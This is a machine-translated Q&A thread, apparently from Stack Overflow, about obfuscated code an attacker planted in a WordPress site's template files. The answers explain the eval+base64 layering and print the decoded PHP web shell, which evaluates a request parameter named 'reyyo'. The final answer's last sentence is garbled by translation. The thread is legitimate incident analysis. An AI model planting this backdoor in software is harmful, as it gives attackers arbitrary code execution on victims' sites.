我朋友的一个wordpress网站遭到某人攻击,他们将以下代码放在所有模板文件的标题上。
我尝试用base64解码器解码它。但输出看起来很奇怪。你能告诉我这是什么类型的编码吗?
答案 0 :(得分:4)
它是一系列eval + base64加密。解码后,代码为:
if (isset($_REQUEST['r' . 'e' . 'y' . 'yo']))
eval(stripslashes($_REQUEST['r' . 'e' . 'y' . 'y' . 'o']));
这是我如何得到的:
\/\*.*?\*\/作为搜索模式,并替换为''(空字符串)eval()条款。将其更改为echo。基本上,此代码允许攻击者在您的网站上注入和执行任意代码。
答案 1 :(得分:3)
最简单的方法是使用正则表达式删除所有评论(/* */),然后将eval()替换为echo()。冲洗并重复。
在两个或三个循环之后,它输出以下内容:
if(isset($_REQUEST['r'.'e'.'y'.'yo']))eval(stripslashes($_REQUEST['r'.'e'.'y'.'y'.'o']));
这意味着eval(),reyyo或$_GET $_POST将$_COOKIE传递给{{1}}。